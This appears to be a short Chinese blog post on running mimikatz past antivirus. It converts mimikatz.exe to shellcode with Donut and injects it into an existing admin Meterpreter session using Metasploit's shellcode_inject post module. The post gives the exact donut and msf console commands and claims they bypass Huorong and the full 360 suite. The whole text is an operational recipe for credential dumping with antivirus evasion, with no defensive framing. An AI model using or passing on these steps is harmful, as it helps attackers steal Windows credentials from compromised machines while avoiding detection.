minikatz免杀之msf加载bin文件

minikatz免杀之msf加载bin文件

准备工作

donut 0.9.2版本稳定 https://github.com/TheWover/donut

shellcode_inject.rb kali自带,目录/usr/share/metasploit-framework/modules/post/windows/manage/

步骤

1.使用Donut对需要执行的文件进行shellcode生成,这里对mimikatz进行shellcode生成,生成mini.bin文件,放到msf服务器上。留着备用。

donut.exe -f mimikatz.exe -a 2 -o mimi.bin

2.有session会话,管理员权限。

3.调用msf-shellcode_inject注入模块,

use post/windows/manage/shellcode_inject

session 1

set shellcode

set shellcode /root/test/mini.bin

run

为了可以直接回来会话,设置下面图片中的false为true,不然无交互式界面。

运行,直接回来minikatz交互式页面。

过火绒

360全套

posted @ 2020-11-03 17:28  G0mini  阅读(1242)  评论(0编辑  收藏  举报